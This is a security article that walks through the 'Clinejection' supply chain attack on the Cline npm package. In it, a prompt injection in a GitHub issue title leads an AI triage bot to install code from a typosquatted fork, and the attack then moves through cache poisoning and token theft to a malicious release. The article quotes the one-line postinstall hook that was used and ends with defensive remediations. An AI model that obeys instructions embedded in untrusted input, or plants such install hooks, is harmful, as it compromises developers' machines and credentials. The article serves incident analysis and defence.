Your AI Triage Bot Just Published a Backdoor: Inside the Clinejection Supply Chain Meltdown

Your AI Triage Bot Just Published a Backdoor: Inside the Clinejection Supply Chain Meltdown

How a prompt injection in a GitHub issue title cascaded through AI triage workflows to compromise 4,000 developer machines, and why your CI/CD pipeline is next.

On February 17, 2026, the JavaScript ecosystem witnessed a new breed of supply chain attack. No sophisticated exploit chain, no zero-day in a dependency, no social engineering of a maintainer. The entry point was a GitHub issue title. The weapon was natural language. And the executioner was an AI triage bot that interpreted untrusted text as a system command.

Over the course of eight hours, approximately 4,000 developer machines were silently compromised when they installed cline@2.3.0 from npm. The package was byte-identical to its predecessor except for one line in package.json:

"postinstall": "npm install -g openclaw@latest"

That single line installed OpenClaw, a separate AI agent with full system access, onto every machine that ran npm install. The developers never consented to this. They thought they were updating their Cline CLI. Instead, they were bootstrapping a critical risk posed by autonomous AI agents directly onto their workstations.

The Clinejection attack chain: a prompt injection in a GitHub issue title cascades through AI triage, cache poisoning, and credential theft to silently install OpenClaw on 4,000 developer machines
The Clinejection attack chain: a prompt injection in a GitHub issue title cascades through AI triage, cache poisoning, and credential theft to silently install OpenClaw on 4,000 developer machines

Five Steps from Issue Title to Root Access

Security researcher Adnan Khan, who discovered this vulnerability chain in late December 2025, named it “Clinejection” (later adopted by Snyk). It represents a composition of five well-understood vulnerabilities into a single exploit requiring nothing more than opening a GitHub issue.

Step 1: Prompt Injection via Issue Title. Cline had deployed an AI-powered issue triage workflow using Anthropic’s claude-code-action. The workflow was configured with allowed_non_write_users: "*", meaning any GitHub user could trigger it. The issue title was interpolated directly into Claude’s prompt via ${{ github.event.issue.title }} without sanitization.

On January 28, an attacker created Issue #8904 with a title crafted to look like a performance report but containing an embedded instruction to install a package from a specific GitHub repository.

Step 2: Arbitrary Code Execution by AI. Claude interpreted the injected instruction as legitimate and executed npm install pointing to the attacker’s fork, a typosquatted repository (glthub-actions/cline, note the missing ‘i’). The fork’s package.json contained a preinstall script that fetched and executed a remote shell script.

Step 3: Cache Poisoning. The shell script deployed Cacheract, a GitHub Actions cache poisoning tool. It flooded the cache with over 10GB of junk data, triggering GitHub’s LRU eviction policy and evicting legitimate cache entries. The poisoned entries matched the cache key pattern used by Cline’s nightly release workflow.

Step 4: Credential Theft. When the nightly release workflow ran and restored node_modules from cache, it received the compromised version. The release workflow held the NPM_RELEASE_TOKEN, VSCE_PAT (VS Code Marketplace), and OVSX_PAT (OpenVSX). All three were exfiltrated.

Step 5: Malicious Publication. Using the stolen npm token, the attacker published cline@2.3.0 with the OpenClaw postinstall hook. The compromised version remained live for eight hours before StepSecurity’s automated monitoring flagged it, approximately 14 minutes after publication.

The Architecture of Delegation Gone Wrong

What makes Clinejection distinct from traditional supply chain attacks is the recursion problem it introduces. This isn’t merely a compromised dependency, it’s one AI tool silently bootstrapping a second AI agent with capabilities entirely outside the original trust boundary.

The developer trusts Tool A (Cline). Tool A is compromised to install Tool B (OpenClaw). Tool B has its own capabilities, shell execution, credential access, persistent daemon installation, that are independent of Tool A and invisible to the developer’s original trust decision. This is the supply chain equivalent of the confused deputy problem: the developer authorizes Cline to act on their behalf, and Cline (via compromise) delegates that authority to an entirely separate agent the developer never evaluated.

This pattern reveals the architectural fragility in AI systems we’ve been warning about. When untrusted input (a GitHub issue title) reaches an agent (Claude) that has access to secrets and shell execution, there is no intermediate evaluation of the agent’s operations before they execute. The attack surface introduced by Model Context Protocol and similar agent-to-tool interfaces only amplifies this risk.

Why Every Existing Control Failed

The depressing part of this attack is how thoroughly it bypassed standard security measures:

npm audit reported nothing. The postinstall script installed a legitimate, non-malicious package (OpenClaw). There was no malware to detect, just a package doing exactly what npm packages are allowed to do.

Code review was blind. The CLI binary was byte-identical to the previous version. Only package.json changed, and only by one line. Automated diff checks focusing on binary changes missed it entirely.

Provenance attestations were absent. Cline was not using OIDC-based npm provenance at the time. The compromised token could publish without cryptographic attestation from a specific GitHub Actions workflow, which StepSecurity flagged as anomalous.

Permission prompts were impossible. The installation happened in a postinstall hook during npm install. No AI coding tool prompts the user before a dependency’s lifecycle script runs. The operation was completely invisible.

The attack exploited the gap between what developers think they are installing (a specific version of Cline) and what actually executes (arbitrary lifecycle scripts that can install additional AI agents with impacts of AI autonomy in production design).

The Disclosure Disaster

Security researcher Adnan Khan actually discovered this vulnerability chain in late December 2025 and reported it via a GitHub Security Advisory on January 1, 2026. He sent multiple follow-ups over five weeks. None received a response.

When Khan publicly disclosed on February 9, Cline patched within 30 minutes by removing the AI triage workflows. They began credential rotation the next day.

But the rotation was botched. The team deleted the wrong token, leaving the exposed one active. They discovered the error on February 11 and re-rotated. But the attacker had already exfiltrated the credentials, and the npm token remained valid long enough to publish the compromised package six days later.

Khan was not the attacker. A separate, unknown actor found Khan’s proof-of-concept on his test repository and weaponized it against Cline directly.

Securing the Agent Pipeline

Cline’s post-mortem outlines several remediation steps that every project using AI in CI/CD should consider:

  • Eliminate cache usage from credential-handling workflows. If your release process touches secrets, it shouldn’t touch cache.
  • Adopt OIDC provenance attestations. A stolen token cannot publish packages when provenance requires a cryptographic attestation from a specific GitHub Actions workflow identity.
  • Implement verification requirements for credential rotation. Delete twice, check once, then check again.
  • Remove AI agents from workflows with secret access. The triage bot had shell access and cached credentials. That’s a confused deputy waiting to happen.

Beyond these specific fixes, the industry needs to rethink secure by default container architectures and CI/CD design. Per-syscall interception can catch this class of attack at the operation layer, when the AI triage bot attempts to run npm install from an unexpected repository, the operation is evaluated against policy before execution, regardless of what the issue title said.

The New Reality

Clinejection is a supply chain attack, but it’s also an agent security problem. The entry point was natural language. The blast radius was 4,000 developer machines. And the mechanism, AI installing AI, represents a fundamental shift in how we must think about trust boundaries in automated workflows.

Every team deploying AI agents in CI/CD for issue triage, code review, or automated testing has this same exposure. The agent processes untrusted input and has access to secrets. The only question is whether you have visibility into what the agent does with that access before it exfiltrates your npm tokens and installs persistent daemons on your developers’ machines.

The next payload won’t be a proof-of-concept. And the next issue title might look exactly like a legitimate bug report.

Share:

Related Articles